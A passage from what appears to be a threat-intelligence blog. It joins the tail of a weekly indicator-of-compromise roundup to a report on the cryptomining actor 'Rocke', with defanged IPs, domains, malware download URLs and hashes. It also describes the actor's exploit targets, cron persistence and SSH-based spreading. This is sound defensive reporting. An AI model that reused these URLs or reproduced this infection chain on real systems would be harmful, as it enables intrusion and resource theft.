• <HKLM>\SYSTEM\CurrentControlSet\Services\VSS\Diag\Shadow Copy Optimization Writer
• <HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
  • Value Name: 2951328147.exe

Mutexes

• N/A

IP Addresses

• 93[.]125[.]99[.]121
• 94[.]231[.]109[.]239
• 87[.]236[.]16[.]31
• 80[.]77[.]123[.]23
• 89[.]252[.]187[.]72
• 87[.]236[.]16[.]29
• 77[.]104[.]144[.]25
• 87[.]236[.]19[.]51
• 95[.]213[.]173[.]173
• 87[.]236[.]16[.]208

Domain Names

• www[.]lagouttedelixir[.]com
• www[.]cakav[.]hu
• www[.]mimid[.]cz
• www[.]fabbfoundation[.]gm
• relectrica[.]com[.]mx
• topstockexpert[.]su
• unnatimotors[.]in
• vjccons[.]com[.]vn
• royal[.]by
• www[.]toflyaviacao[.]com[.]br

Files and or directories created

• \$Recycle.Bin\S-1-5-21-2580483871-590521980-3826313501-500\$I9DT02V.lnk.id-98B68E3C.[backmydata@cock.li].bip
• %UserProfile%\Desktop\KRAB-DECRYPT.txt

File Hashes

• 03a05565633d1a7b916339b179d2998ba0f2391a5f804076eac1bdabd58073db
• 0d25e78ac27d0ae33177d32ba505eb27b662e5b47eb349e3bc90ff4922912100
• 17d8faad65cc55ba4145d3948f2d6d8af553a20863b8e31332390e0b264fe304
• 19a55c08e9253b1cfb5e75ba0cc963006c4e121e6f0ae165b25c243c66f74971
• 27ef40a53faad7f9d08ff2e8e2649f878a3965b4e5edaf052a6fd63c52fe3da6
• 282482f92deecb3e6bb43aa72c39151bccc672907b4bd7e9afb51ded04ac949b
• 28738ba1c8191f4d4119e651436f3ab9740ee22fea8a3b877a0c1f90a7744d93
• 2bf26fe0f26585989ff9c23160867c05fbb817f6565266ce9faeda9291b4b89b
• 344fa6fe96fba331c89ca98a6b739813370519355720670d5d468a49fd9191f9
• 354f463a00be356335dfb1fd6d95f9888a2df87f2299a2ec78366ed983700294
• 3f6fba76a23b0bd34b239cb66df5d491e2ea4a3c199dee39e5f3bd1b303f201e
• 557e03989b74264f90a6e6e8843b7f1e2da369b83e571b31cb051fc19ec005ca
• 565b34697c4d45072a94a442419110f80192ac7cd093a2d695e36505c6a38574
• 81b55b7be0d97d2da88fc1bbb78300ed2dbded9785c8d66db42197b15707136b
• 8b1bb0d2446648f30b9b4847816556fc5a4ca2c3636f612cdb76a5b75c23a00c
• abcf13758ac9ae41a26efaa28431aab8fa704f34f13c629b47c87188ed75ea4b
• b334e0410ccb3f5a27d39ba2f55a87f491a9c18ab9fd7b935d88a4702c7412e2
• c73f8c3f7133426f096b19b3354d3a4512f193c74cf36fc57878c27b318a91b8
• c96689d58b7f9978aea91266888a76d7887932b65a4a257fb8bc9095469a4415
• cba59594fdd4ca6932d28404abc4b0b7b41f873a45f2d47ffe5292e81094a99f
• d5c1c03969093df8ded59a8f030b52a6e0b50a16b72874edeb0b1afe1341a09f
• f0dab3e88bce05940f6bab366953093efc1393e76d6390225da335f70f674743
• f9b03b0475e4d75742e6404e2726fc418f1af36feeded66d0d6fa05cc1dc52ab

Coverage

Screenshots of Detection

AMP



ThreatGrid




Umbrella

Win.Dropper.Ponystealer-6652151-0

Indicators of Compromise

Registry Keys

• <HKCU>\Software\Microsoft\Windows\CurrentVersion\RunOnce

Mutexes

• N/A

IP Addresses

• 45[.]76[.]142[.]81

Domain Names

• salako[.]net

Files and or directories created

• %LocalAppData%\Temp\Xazern\xauzcer.exe
• %LocalAppData%\Temp\Xazern\xauzcer.vbs

File Hashes

• 09dee688fc80457daa589b91ad03e7ba97f886f906fd6b0cfe3007871af29b95
• 33be45cba28b09e3898172e85677970fa8be1efcdabf46b763e4d1e040cee857
• 3671ae9c4921bd8dcd9d5e4cb3328615fbd50d6150e19b2ffa7c8d7d82d44840
• 429f93e374501717c87819fb9da3438817f6bbb2f4078fe8b8f3bc39ce720998
• 42bfe2c5da9a771a2aa3fd92e0ab8ad306d9469db287e223fb06a5b2f6411c9e
• 4bf08911cf7b7111429f7e6cce41816b34098755a3b04ee74f1b4d3638f367d3
• 6b814d2ce74af70810c0a462dfad452489862cd4aab1d51cec38b15b3e4e207a
• 7aaed756dc1d45f2123909cde875ae3468b321235ae94034990b1f41e9ff6f70
• adc247428e07b419c929f8483f99c062beddfdd172af7cdcd40176abd0c1a7ed
• c376469a6e1e1c5bd0a455b2a3e0436d2cf8e2f9bf7a482726ad393ccc3945d3

Coverage

Screenshots of Detection

AMP



ThreatGrid




Umbrella

Win.Dropper.Zbot-6651705-0

Indicators of Compromise

Registry Keys

• <HKCU>\Software\Microsoft\Windows\CurrentVersion\Run
• <HKCU>\SOFTWARE\MICROSOFT\Loxu

Mutexes

• {8EEEA37C-5CEF-11DD-9810-2A4256D89593}

IP Addresses

• N/A

Domain Names

• www[.]crossatlantictrades[.]info

Files and or directories created

• %AppData%\Zyiv\opxoh.uzo
• %AppData%\Ihvywo\ratib.exe
• %LocalAppData%\Temp\tmpb488b983.bat

File Hashes

• 1ba6b7755498310936c49e2b704d8aa5d22848d845aeecff0a7c680466ff6010
• 3213b7273cec771dce3f249d069d955c71472e049c6d5471d7a1094ee48b03bc
• 3eed5033e3d096b0430ddba825e5ab883e6277e1bb7b8d26fac512b508572830
• 45f3c9a100dc1bef357158a3c648dabbb5002169b65c30e22d6cf84a622d7f2f
• 523993e65033cbd402d4b7d5a460be0a91f83c7f849ecc2d594f77d3c6d7ec3f
• 61a138b11a4720e5a48c4f9e7134cc812db28189d603fe2971a4f1c3af7bc94b
• 860f2a54c4541c8c4f288223f586171bcf7bd34f516e2945ef2a677c422fb9ed
• a27334fbd63647786367229c83fa4726f8accb19c9daa1585e6396fb010312d6
• a4a5bcb01343e9597e6a2e683eb23f457c2c8136ed0a93f2e9d65629824458e0
• b8db41e6dfffda29c0776b25c9ca1a9cd3e171fde6a940b269de942a121bb650

Coverage

Screenshots of Detection

AMP



ThreatGrid



Umbrella

PUA.Win.Adware.Ibryte-6651661-0

Indicators of Compromise

Registry Keys

• <HKCU>\SOFTWARE\MICROSOFT\RAS AUTODIAL\Default

Mutexes

• N/A

IP Addresses

• 204[.]11[.]56[.]48
• 185[.]53[.]179[.]7

Domain Names

• imp[.]fusioninstall[.]com
• downloadfastfree[.]com
• install[.]oinstaller2[.]com
• secure[.]oinstaller6[.]com

Files and or directories created

• %LocalAppData%\Temp\nsy34B9.tmp\image.png
• %LocalAppData%\Temp\nsy34B9.tmp\nsisdl.dll

File Hashes

• 0cc4df786af790678de7d97a9f8b3219113b21f5bac09bb6c9bdae6f465f9bcd
• 1897bf161100612c0d15e16b5b7dd80060fb91ee651346c80728ec83f01d7f45
• 5bb6145d308cfd1996c3255f0e5939b74c7f252aff90d160ccb1e005254b20de
• 5ee45058a8b7c48ef494003aa0f132d1c403ada040da8ca97ae004e57e1bb0cc
• 608778c41ca1522c315889cf5e3c0f1c2f114c881f3254044740f2aa34461e11
• 69ff0daad305242e0f30e431b7d3d717496a16ebdecd639c5deb42f504ac4fc6
• 73f7c7ef6e2866b9647106ec68696e8e3c7d4a88dd3cd4f979894da25e3caa90
• 861ea30e5b455525de47bf4818fe8b9a27aa05a494535feb999455b3c80390d8
• 9c74e5e01edbafcfae16ceaa240138e50ff5e7d4ef81809cb052212c313ad781
• cb79344e72e17249005a0087be94a84698604d9ba0ff394d56299b85d7f4818f

Coverage

Screenshots of Detection

AMP



ThreatGrid




Umbrella

Win.Dropper.Razy-6651608-0

Indicators of Compromise

Registry Keys

• <HKLM>\Software\Wow6432Node\Microsoft\Tracing\RASAPI32
• <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
  • Value Name: Windows Update

Mutexes

• N/A

IP Addresses

• 104[.]16[.]16[.]96
• 213[.]180[.]204[.]38
• 217[.]66[.]226[.]116
• 104[.]16[.]18[.]96
• 104[.]16[.]19[.]96
• 65[.]154[.]166[.]201

Domain Names

• whatismyipaddress[.]com
• smtp[.]yandex[.]com
• ns7[.]hadara[.]ps
• smtp[.]zoho[.]com

Files and or directories created

• %AppData%\pid.txt
• %AppData%\pidloc.txt
• %LocalAppData%\Temp\holdermail.txt
• %LocalAppData%\Temp\bhvDCAA.tmp
• %LocalAppData%\Temp\holderwb.txt
• %AppData%\WindowsUpdate.exe

File Hashes

• 00ca8e4068f0759ef4e7828cbac93cc8e6768891c8c4cd8f6d642514464f8302
• 16fc7578dae6e8014d5d074e13b2adde3fbd2553bbefee50202f5bf60e547fbd
• 1b9d906012164cf39573d4f8651165742d02ee30ade241947f2917f533da345a
• 232f90e65054b1d251a88b963dd9b05289657e6930b3770d8ff58636ff0e487e
• 42ef9786694483987e92146817745bab9e56209cc35051f158c5ccc6bffa51b7
• 4476a70d770a83f111902b7b0308dbb5cc749f747f2dcca1e1c9a2f0d884b2a0
• 4bd8522ff7e8cf87a89667cf1e0b42a26889487c16fdc6abe69d0ac823e25b6a
• 603487769c60730c697f30717b2093f84451557b251e2d187cdb1842e8db9d4e
• 634f44b01ae79874f4b08ff130a6ab8a04fdd7196812a4300bb55039d56638ca
• 63573bfd0e8c03f42b9194a77acb7da2765396ad4e9ec75b1b853a7245d58600
• 735d19fbf1a9f8a34bcb445d204e51e854c1463072ac01149a8e67c08b97307d
• 75af93db078e56bea18101170b02ce450a9e0216f2b8c3dcff23b83ba76f3a56
• 760065e0657bfb7a952c199fe8a6f15a2bbd5843f1902a4d37c8411d7b9c9d9b
• 777c42471101c9048be523cced54a807c56fab6504e0cc578f4934b4c56c4de9
• 7d113888ef4821c893a078acd7d7e40bd44f150aa4b575987ee4fb802ce35224
• 8fa0f87391d3ee93f16ae5c6a5ea116d2a67d0a2b5c60ed801e53e96aa9a32d8
• a4bf29f13f50d6f4f0e0bfa95af5e89944d0297271b34b77b9a4c915e6ca2b55
• c9dd220291b6542aa9ef92e2872f02de4c323c47f9b4e9730a1c97aab2e2c763
• cfdb62ff82215a70edc66f5593cc06d2e0a0f3d842af5b726a95a5debb765176
• d1dce43c9ff30383a0928cc2423a7370636088a8135c94f905ad37c7dae910aa
• d2ddd1c35d5037984c0885dd411c64361f97738fa041590794e23f073bb1e0ab
• e00e64c5b25507d7323653736da4cd9775816fea7bfd67f9532462b1ec531b32
• eabe6d32b9e2ec97c2fe909e5d0f3a89f974c63dcc2ce43bce5a9c0121ca781e
• f793a4aa08d82d3f3719a8fb376df98f2d2d8dc102af7a0d479bc479c26649a1

Coverage

Screenshots of Detection

AMP



ThreatGrid



Umbrella

Win.Dropper.Cloud-6651616-0

Indicators of Compromise

Registry Keys

• N/A

Mutexes

• DENEK

IP Addresses

• 204[.]95[.]99[.]176

Domain Names

• spectrun2008[.]no-ip[.]org
• joaosgk03[.]sytes[.]net

Files and or directories created

• %LocalAppData%\Temp\Pa7Y5giSl017
• %LocalAppData%\Temp\aut6F2A.tmp

File Hashes

• 1497ef726ad9a29b9b64cf16c21fb5b80610e52683de177f9d9ece346788dfc0
• 1dd1fc2ed544f68ba727ed4a02caf935e45ecfa86b02944fbd937680025f2379
• 21ed019435f9541eafae5ef372ac33fdb1c967ecbbd17919d31f152bf858888f
• 485e5121db35bec9dccc93580c470779c01bdad591df7c1d7a40473c0ffd6e73
• 4b7aa109189b3f2738747216ba49d0bb4c9b97b44df3932ad1189b74dcb409c1
• 557c69500e9cdecd65c402f309b414abc9777fe9fd36236eeaf9d533025f6e66
• 58115870df165c7031e5304cba8e059366ae1ee935484f67154ccacf0eae62ee
• a9427d85c27aea20ba8fdecd7d6dae561dc676dd2e106261e8108fcc4005ed97
• c771d4c4de77633786c355722f784bac0665cd457ff19c6441ef99730b8d76f3
• df0a6ff9574bb522ca340fd83a24cc096f1c3ea36b66097155862b71f4383c34
• e4b90714b55aaa69027eaf3e0bf52a3f392aa09e3e4463744d5e8d3ed64837f7
• f66dcfa6695042e6050dee3cea7948a80b217e8345919f6b90cef22f1ecddc4a
• f9c5dcf920e1ba39fbe35cc7dc9dcabea6c6f67d533559c06664aa3665cd4bd4

Coverage

Screenshots of Detection

AMP



ThreatGrid



Umbrella

PUA.Win.Adware.Dotdo-6651541-0

Indicators of Compromise

Registry Keys

• <HKLM>\Software\Microsoft\Tracing\po3v5cyhl_RASAPI32
• <HKLM>\Software\Microsoft\Tracing\po3v5cyhl_RASMANCS
• <HKLM>\Software\Microsoft\Tracing\3v5cyhl_RASMANCS

Mutexes

• N/A

IP Addresses

• 198[.]54[.]117[.]200
• 52[.]205[.]106[.]49
• 34[.]202[.]10[.]177

Domain Names

• www[.]lubricantshaffey[.]win
• s841[.]datarating[.]com

Files and or directories created

• %LocalAppData%\Temp\nsnBDF8.tmp\sph9d7jl1.exe
• %LocalAppData%\Temp\nsnBDF8.tmp\extss.txt
• %LocalAppData%\Temp\nsnBDF8.tmp\po3v5cyhl.exe
• %LocalAppData%\Temp\nsnBDF8.tmp\dsph9d7jl1.exe

File Hashes

• 16aa5f4db1485896a6dfd2cef40a6243c0371a213c18d2832c7a9070b7e9002a
• 434a7a324719c74ce3fa0dfd96bfdc14379ca8a0af954247320a1a76e80f995c
• 70fd79d11821428a90b1c3869f846329af646e014887d72b1f4df531f8d33ab7
• 8a4f468b126f0c309f5a64cd694a503aa7269d03372d3946e643005b30986475
• 99ba03979407568ba6b1ed32184a043661608e039c9a3511c9a910a31dcd0ccf
• 9adbf86b70ad8d487a1f67b4650b68b0dc03bdc84a7e84b1654fe8ff61a7cb88
• b105d0c22989e4856995573a59ff1034ee6ef4ead24c2573ca688da4c94c60ee
• cd18a0939f808496f5e05d3b996ed2a8d13dc94261ce329ac209ae086e7b9d5d
• d399c525b8da116f8ab17333b78a88f20401ddd960405631e2cc52e7054bbcc4
• da1842c44891d3ca1229ef8b8959edd4f974d21c700fec7ca64f3124a6493be4
• dc7d530a26e005dd8766fd52c5d62c06c458a9018828a3ec4c8f80832ebae221
• fae36f1c522c56bace27be915fd9e23748ec01ac9e87810348cbdfcf53a2a87b
• fb388f3cd64b8a65db9584f1526eef8d4b876b5bc61c8674b4caf8bccf78a4e4

Coverage

Screenshots of Detection

AMP



ThreatGrid



Umbrella

Win.Dropper.Fareit-6651429-0

Indicators of Compromise

Registry Keys

• N/A

Mutexes

• NMYQsgquQO

IP Addresses

• 78[.]47[.]139[.]102
• 212[.]112[.]245[.]170
• 154[.]35[.]32[.]5
• 193[.]23[.]244[.]244
• 62[.]210[.]204[.]55
• 185[.]106[.]154[.]118
• 51[.]15[.]44[.]251

Domain Names

• myexternalip[.]com

Files and or directories created

• %AppData%\tor\lock
• %AppData%\Microsoft\Windows\Start Menu\Programs\Startup\cc.exe.vbs
• %AppData%\tor\cached-microdescs.new
• %AppData%\tor\unverified-microdesc-consensus

File Hashes

• 02c77b65bd25f4708f6b7f82b60689f3ace02639e4d262f172633e73f1e18071
• 0587813e2d50a8bc2a3b6cca7749c3d134b51826ae7f13f832eeffc283306110
• 06af72696ebe7994f9542af787dd5cb357b4348248c72038c7880fbeb67110be
• 079f068987d7c53e2e47c39b89ca6f412a7a17e34992eaa33757aa99e29a47d8
• 0ba6e0f83d3c3239cef5f30d2600c2e4d3e9b9ddb45a40cfbfcd86622a47b610
• 0e12f2bc801777198026a86c920edac32b1eb874670730cf3f033a8e9fdba2b0
• 13c96d7301e2b6bf3c9c9cde9199bbb538caee0ca068a9f54190af1f43059400
• 16f755b71840a1e6c8de8a4bc6920cf2af1e8e821c2a77df2e3151dbba679a13
• 195e09cca7a53e51250418e1c75157d5aab8269186dc68ba98fb5e934c2bc15c
• 1b8e74fa84432c944ec2b239ab67abfac39b496a1e96dca7c0a7e92255457ecd
• 1e53faedd0d111860b9eeabac7d61f0306c1d516fec0d11d043e83b361ab8e95
• 202a7444df57d7f3846d3b58a2a887f28dc64d2727569af2255b26aa395ac441
• 2128405a27110cf86a1f9f41ca06717ad3c9a2598302cdf19531932e51c4ece4
• 222ad72cf417a849ec0d96199345cbe7340d3978d3c396dd45444f12ae8415e5
• 22e4fde98af07c792e71e81a003f5472c868e5a05eb7c45c4eac9622d4c03345
• 2623021afd3dca853fa09e36d31539ff55b9843cbec915dd64375ca31943ddca
• 2666e5aae4ecb9ed923a4e16d5c9af953bd4a2082295df3724b7bf2697b36616
• 27990924f27b7fc60db6fef7323ee841507f94c2fdd3bc27a446d537fb3989cc
• 28083fe9ca79c1e20e4fc1f38cb8cdc7061bcef37e255bca5971e33feadb414f
• 28bcac13100c3b048b9ce179f7896a729889af0b3461306f1f7d48f1baa3b212
• 2b8825719d8001c42affc76b776d266aed8055cb40eced293632515f8841664d
• 2d7a16ee5f9c2bfd89651b044accd40a49581bb5dd1ca8a58d46f986ea73be72
• 2ff7012e08a2a95c39e56df2e0a5f8d9d6c82e1da218d89e35d4da770b8c6d54
• 32ee9fdd809fc9e467f23b69bf961d9a79a5dae849219df99da1e443a621a015
• 413f4a778b3edd7577b62165d567b2c438d1bbde941c0fe05875e775bd13ac4d

Coverage

Screenshots of Detection

AMP



ThreatGrid

Summary

Cryptocurrency miners are becoming an increasingly significant part of the threat landscape. These malicious miners steal CPU cycles from compromised devices to mine cryptocurrencies and bring in income for the threat actor.

In this post, we look at the activity of one particular threat actor: Rocke. We will examine several of Rocke's campaigns, malware, and infrastructure while uncovering more information about the actor. After months of research, we believe that Rocke is an actor that must be followed, as they continue to add new features to their malware and are actively exploring new attack vectors.

Introduction

Talos has written widely about the issue of cryptomining malware and how organizations should protect systems against this threat. We continue to actively research developments in this threat through research that includes monitoring criminal forums and deploying honeypot systems to attract these threats. It is through these intelligence sources that the Chinese-speaking actor which we refer to as "Rocke" came to our attention.

Rocke actively engages in distributing and executing cyrptomining malware using a varied toolkit that includes Git repositories, HttpFileServers (HFS), and a myriad of different payloads, including shell scripts, JavaScript backdoors, as well as ELF and PE miners.

Early campaigns

This threat actor initially came to our attention in April 2018, leveraging both Western and Chinese Git repositories to deliver malware to honeypot systems vulnerable to an Apache Struts vulnerability.

Several files were downloaded to our Struts2 honeypot from the Chinese repository site gitee.com for a user named "c-999." Subsequently, the Gitee user page transitioned to "c-888." Around the same time, we observed similar activity pulling down files from a gitlab.com repository page for a user named "c-18."

The repositories on both Gitee and GitLab were identical. All the repositories had a folder called "ss" that contained 16 files. The files were a collection of ELF executables, shell scripts, and text files that execute a variety of actions, including achieving persistence and the execution of an illicit cryptocurrency miner.

Once the threat actor had compromised a system, they achieved persistence on the device by installing a cron job that downloads and executes a file "logo.jpg" from "3389[.]space." This file is a shell script which, in turn, downloads mining executables from the threat actor's Git repositories and saves them under the filename "java." The exact file downloaded depends on the victim's system architecture. Similarly, the system architecture determines if "h32" or "h64" is used to invoke "java."

Although we first observed this actor exploiting vulnerabilities in Apache Struts, we've also observed what we believe to the same individual exploiting an Oracle WebLogic server vulnerability (CVE-2017-10271), and also exploiting CVE-2017-3066, a critical Java deserialization vulnerability in the Adobe ColdFusion platform.

Recent campaign

In late July, we became aware that the same actor was engaged in another similar campaign. Through our investigation into this new campaign, we were able to uncover more details about the actor.

We observed a wget request from our Struts2 honeypot for a file named "0720.bin" located on 118[.]24[.]150[.]172:10555. We visited this IP and found it was an open HFS hosting "0720.bin" along with 10 additional files: "3307.bin," "a7," "bashf," "bashg," "config.json," "lowerv2.sh," "pools.txt," "r88.sh," "rootv2.sh" and "TermsHost.exe." We set about examining these files.

Screenshot of HFS system

We had previously observed this same IP scanning for TCP port 7001 throughout May 2018. This was potentially a scan for Oracle WebLogic servers, which listens on TCP port 7001 by default.

Both "0720.bin" and "3307.bin" are similar ELF files of similar size (84.19KB) that reach out to 118[.]24[.]150[.]172, and were marked clean in VirusTotal at the time of discovery. Morpheus Labs described a similar file that connects to the same IP address, which could open a shell on the victim's machine if a password-verified instruction was issued from the C2. In both our samples, as well as the ones that Morpheus Labs described, the hard-coded password was not only identical, but also located at the same offset.

Hard-coded password

"A7" is a shell script that kills a variety of processes related to other cryptomining malware (including those with names matching popular mining malware such as "cranberry," "yam," or "kworker"), as well as mining in general (such as "minerd" and "cryptonight"). It detects and uninstalls various Chinese AV, and also downloads and extracts a tar.gz file from blog[.]sydwzl[.]cn, which also resolves to 118[.]24[.]150[.]172. The script downloads a file from GitHub called "libprocesshider," which hides a file called "x7" using the ID preloader. The script looks for IP addresses in known_hosts and attempts to SSH into them, before downloading "a7" again from the actor's HFS at 118[.]24[.]150[.]172, and execute it.

Extract of Source Code of "a7"

"Config.json" is a mining config file for XMRig, an open-source Monero miner. The file sets the mining pool as xmr[.]pool[.]MinerGate[.]com:45700 and the actor's wallet as rocke@live.cn. This is why we have named the actor "Rocke" (note that for MinerGate, an email can be used in place of a Monero wallet number — it's simply the login email for the MinerGate platform). "Pools.txt" appears to be a config file for XMR-stak, an open-source universal Stratum pool miner that mines Monero, Aeon and more. This configuration file contains the same actor pool and wallet information as the first.

"Bashf" is a variant of XMR-stak while "bashg" is a variant of XMRig.



"Lowerv2.sh" and "rootv2.sh" are similar shell scripts that attempt to download and execute the mining malware components "bashf" and "bashg," hosted on 118[.]24[.]150[.]172. If the shell scripts do not download a miner from 118[.]24[.]150[.]172, they attempt to download a file called "XbashY" from 3g2upl4pq6kufc4m[.]tk.

"R88.sh" is a shell script that installs a cron job and attempts to download "lowerv2.sh" or "rootv2.sh."

"TermsHost.exe" is a PE32 Monero miner. Based on the config file it uses, it appears to be the Monero Silent Miner. This miner can be purchased online for $14 and targets malicious actors. Advertising for the miner promotes it as offering startup registry key persistence, mining only while idle, and the ability to inject the miner into "Windows processes to bypass firewalls." The sample grabs the config file "xmr.txt," which contains the same configuration information as the previous files, from Rocke's command and control (C2) server hosted on sydwzl[.]cn. The sample then injects code into notepad.exe, which then proceeds to communicate with the MinerGate pool. The sample also creates the UPX-packed file "dDNLQrsBUE.url" in the Windows Start Menu Folder. Intriguingly, this file appears to share some similarities with Cobalt Strike, the popular penetration testing software, which would allow the attacker to have greater control over the infected system.

The payload appears to be similar to one used by the Iron Cybercrime Group, as reported by cybersecurity firm Intezer in May. Both Iron and Rocke's malware behave similarly, and reach out to similar infrastructure. So, while we can asses with high confidence that the payloads share some code base, we are still unsure of the exact relationship between Rocke and Iron Cybercrime Group.

The actor

Through Rocke's MinerGate Monero wallet email rocke@live.cn, we were able to uncover additional information about the actor. We noticed that Rocke's C2 was registered to the address jxci@vip.qq.com. We then found a leak of user information from the Chinese security site FreeBuf that showed that a user named "rocke" was associated with the email jxci@vip.qq.com. This suggested that they were one in the same. [4]

Rocke has been observed seeking access to cloud storage services, as well as obtaining manuals for programming in the Chinese Easy language.

The majority of websites registered to Rocke list Jiangxi Province addresses for their registration. Some of these websites were for Jiangxi-based businesses, such as belesu[.]com, which sells baby food. We had had additional indications that Rocke is from Jiangxi based on their GitHub (see below). It is possible that the "jx" in jxci@vip.qq.com stands for Jiangxi. Therefore, we assess with high confidence that Rocke operates from Jiangxi Province.

The GitHub

We identified a GitHub page apparently associated with Rocke. The GitHub page lists Rocke as being affiliated with Jiangxi Normal University. In one repository folder, we found several of the same files which were found on the HFS system, including several of the shell scripts with their wallet information included, as well as variants of the miner.



We found additional repositories for the same account. Within these repositories, we found scripts similar to those found in previous campaigns, with the exception that they reached out to sydwzl[.]cn in addition to the previously observed domain 3389[.]space. These findings support the link between Rocke and the activity we previously observed in April and May.

We also found an additional repository through Rocke's page that's hosting nearly identical content, but with a different C2. However, we are unable to determine how that page is being used or who is using it.

The files within their various repositories show that Rocke has become interested in browser-based JavaScript mining through the tool CryptoNote, as well as browser-based exploitation through the Browser Exploitation Framework. It appears that they are relying on fake Google Chrome alerts, fake apps, and fake Adobe Flash updates to social engineer users into downloading malicious payloads.





One of the JavaScript files in the repository, named "command.js," uses hidden IFrames to deliver payloads hosted on CloudFront domains. The payload that we were able to obtain was UPX packed and behaved very similarly to the file "dDNLQrsBUE.url" dropped by "TermsHost.exe."

Rocke has also shown interest in other security-related repositories. They have forked repositories with exploit information, including those related to Apache Struts 2, JBoss and Shadow Brokers, as well as more general-use tools such as masscan, proxy tools and brute forcers.

Conclusion

Based on their activity in the past few months, Talos assesses with high confidence that Rocke will continue to leverage Git repositories to download and execute illicit mining onto victim machines. It is interesting to note that they are expanding their toolset to include browser-based miners, difficult-to-detect trojans, and the Cobalt Strike malware. Besides noisy scan-and-exploit activity, it appears that Rocke is likely also pursuing social engineering as a new infection vector, as demonstrated by the repositories involving fake Adobe Flash and Google Chrome updates.

Despite the volatility in the value of various cryptocurrencies, the trend of illicit cryptocurrency mining activity among cybercriminals shows no signs of abating. Rocke's various campaigns show the variety of infection vectors, malware, and infrastructure that these criminals will employ to achieve their goals.

IOCs:

Earlier campaign:

Attacking IPs targeting Struts:

52[.]167[.]219[.]168: Attacking IP using repo at gitlab
120[.]55[.]226[.]24: Attacking IP using repo at gitee

Attacking IP targeting WebLogic:

27[.]193[.]180[.]224

Attacking IPs targeting ColdFusion:

112[.]226[.]250[.]77
27[.]210[.]170[.]197
112[.]226[.]74[.]162

Domains

3389[.]space

URLs

hxxps://gitee[.]com/c-999/ss/raw/master/ss/a
hxxps://gitee[.]com/c-999/ss/raw/master/ss/config[.]json
hxxps://gitee[.]com/c-999/ss/raw/master/ss/dir[.]dir
hxxps://gitee[.]com/c-999/ss/raw/master/ss/h32
hxxps://gitee[.]com/c-999/ss/raw/master/ss/upd
hxxps://gitee[.]com/c-999/ss/raw/master/ss/x86_64
hxxps://gitee[.]com/c-999/ss/raw/master/ss/h64
hxxps://gitee[.]com/c-999/ss/raw/master/ss/x
hxxps://gitee[.]com/c-999/ss/raw/master/ss/run
hxxps://gitee[.]com/c-999/ss/raw/master/ss/logo[.]jpg
hxxps://gitee[.]com/c-888/ss/raw/master/ss/a
hxxps://gitee[.]com/c-888/ss/raw/master/ss/cron[.]d
hxxps://gitee[.]com/c-888/ss/raw/master/ss/dir[.]dir
hxxps://gitlab[.]com/c-18/ss/raw/master/ss/x
hxxps://gitlab[.]com/c-18/ss/raw/master/ss/x86_64
hxxps://gitlab[.]com/c-18/ss/raw/master/ss/run
hxxps://gitee[.]com/c-888/ss/raw/master/ss/upd
hxxps://gitlab[.]com/c-18/ss/raw/master/ss/upd
hxxps://gitee[.]com/c-888/ss/raw/master/ss/x
hxxps://gitlab[.]com/c-18/ss/raw/master/ss/cron[.]d
hxxps://gitee[.]com/c-888/ss/raw/master/ss/h64
hxxps://gitlab[.]com/c-18/ss/raw/master/ss/a
hxxps://gitee[.]com/c-888/ss/raw/master/ss/config[.]json
hxxps://gitlab[.]com/c-18/ss/raw/master/ss/config[.]json
hxxps://gitee[.]com/c-888/ss/raw/master/ss/run
hxxps://gitlab[.]com/c-18/ss/raw/master/ss/h32
hxxps://gitlab[.]com/c-18/ss/raw/master/ss/dir[.]dir
hxxps://gitee[.]com/c-888/ss/raw/master/ss/x86_64
hxxps://gitee[.]com/c-888/ss/raw/master/ss/h32
hxxps://gitlab[.]com/c-18/ss/raw/master/ss/h64
hxxp://93[.]174[.]93[.]149/[.]xxxzlol[.]tar[.]gz
hxxps://gitee[.]com/c-888/ss/raw/master/ss/logo[.]jpg
hxxps://gitlab[.]com/c-18/ss/raw/master/ss/logo[.]jpg

Hashes:

Logo.jpg: ad68ab153623472bbd8220fb19c488ae2884d9b52bc65add5d54b1821b4b743a
a: 6ec8201ef8652f7a9833e216b5ece7ebbf70380ebd367e3385b1c0d4a43972fb
cron.d: f6a150acfa6ec9d73fdecae27069026ecf2d833eac89976289d6fa15713a84fe
dir.dir: a20d61c3d4e45413b001340afb4f98533d73e80f3b47daec42435789d12e4027
h32: 45ed59d5b27d22567d91a65623d3b7f11726f55b497c383bc2d8d330e5e17161
h64: 7fe9d6d8b9390020862ca7dc9e69c1e2b676db5898e4bfad51d66250e9af3eaf

logo.jpg (from gitee[.]com): f1f041c61e3086da8157745ee01c280a8238a379ca5b4cdbb25c5b746e490a9b

logo.jpg (from gitlab[.]com): ad68ab153623472bbd8220fb19c488ae2884d9b52bc65add5d54b1821b4b743a

run: 0c358d826c4a32a8c48ce88eb073f505b555fc62bca6015f5270425c58a0d1c5
upd: 187d06f1e6020b6787264e2e700c46c463a7818f07db0b051687f3cba65dbe0b
x (32-bit miner): 6e80a9d843faf27e239b1a767d29c7443972be1ddf5ff5f5f9fc9a2b55a161f5
x86_64 (64-bit miner): 2ad07f8d1985f00cd05dafacbe5b6a5b1e87a78f8ae8ecdf91c776651c88a612

More recent campaign:

IPs

123[.]249[.]9[.]149: Issues get request for 0720.bin
118[.]24[.]150[.]172: Rocke's HFS, also resolves to C2 sydwzl[.]cn

Domains:

sydwzl[.]cn
blockbitcoin[.]com: Reached out to by Install.exe
dazqc4f140wtl[.]cloudfront[.]net: file server
3g2upl4pq6kufc4m[.]tk: file server
d3goboxon32grk2l[.]tk: file server
enjoytopic[.]tk: file server
realtimenews[.]tk: file server
8282[.]space: older C2

Domains registered to Rocke (not all are necessarily malicious):

5-xun[.]com
88180585[.]com
firstomato[.]com
jxtiewei[.]com
ncyypx[.]net

URLs

hxxp://d20blzxlz9ydha[.]cloudfront[.]net/Install.exe
hxxp://www[.]amazon[.]com:80/N4215/adj/amzn.us.sr.aps?sz=160x600&oe=oe=ISO-8859-1;&sn=12275&s=3717&dc_ref=http%3A%2F%2Fwww.amazon.com
hxxp://www[.]amazon[.]com:80/s/ref=nb_sb_noss_1/167-3294888-0262949/field-keywords=books

Hashes

55dbdb84c40d9dc8c5aaf83226ca00a3395292cc8f884bdc523a44c2fd431c7b 0720.bin
751cb6c39691904ffbef86fe3bdfa737e4ba64add4dd90358245fa2b775 3307.bin
89b3463664ff13ea77256094844c9cf69d3e408d3daf9ffad3aa18af39bab410 TermsHost.exe
d341e3a9133e534ca35d5ccc54b8a79f93ff0c917790e7d5f73fedaa480a6b93 a7
